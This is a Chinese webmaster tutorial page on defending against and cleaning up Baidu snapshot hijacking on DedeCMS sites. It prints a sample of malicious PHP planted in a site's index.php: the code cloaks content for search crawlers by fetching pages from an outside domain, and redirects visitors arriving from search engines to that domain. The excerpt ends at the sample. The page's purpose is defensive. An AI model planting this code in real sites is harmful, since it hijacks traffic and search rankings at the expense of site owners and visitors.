织梦dedecms百度快照劫持注入代码防范与清除

主页 > 建站问题 > 网站运营 > 织梦dedecms百度快照劫持注入代码防范与清除

分类

CSS/HTML 后端开发开发手册 CMS教程网站漏洞 SEO教程网站运营标签调用程序开发故障问题织梦技巧安装使用织梦插件

织梦dedecms百度快照劫持注入代码防范与清除

2019-05-24 09:46 来源：网站运营作者：模板下载

用dede模板做的站，由于安全问题，百度快照劫持注入代码防范及清除，很多站长做站的过程中，都碰过百度快照被劫持等问题，明明已经修复模板文件了，还是没有更新回正常的快照，以织梦CMS 为例，往往根目录/index.php也被植入恶意代码比如：查看源码打印代码帮助 1 ?php 2 3 if (strpos($_SERVER[ HTTP_USER_AGENT ], spider )||strpos($_SERVER[ HTTP_USER_AGENT ], google )-1){ $str=file […]

用dede模板做的站，由于安全问题，百度快照劫持注入代码防范及清除，很多站长做站的过程中，都碰过百度快照被劫持等问题，明明已经修复模板文件了，还是没有更新回正常的快照，以织梦CMS为例，

往往根目录/index.php也被植入恶意代码

比如：

							查看源码
							
							打印代码帮助

											1
										
											<?php
									
											2
										
											3
										
											if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']);
									
											4
										
											5
										
											foreach ($domain as $v) { if (strpos($fromurl,$v)!==false)
									
											6
										
											7
										
											{ $target="http://域名.com/index.html"; header("Location:".$target); exit; }}?>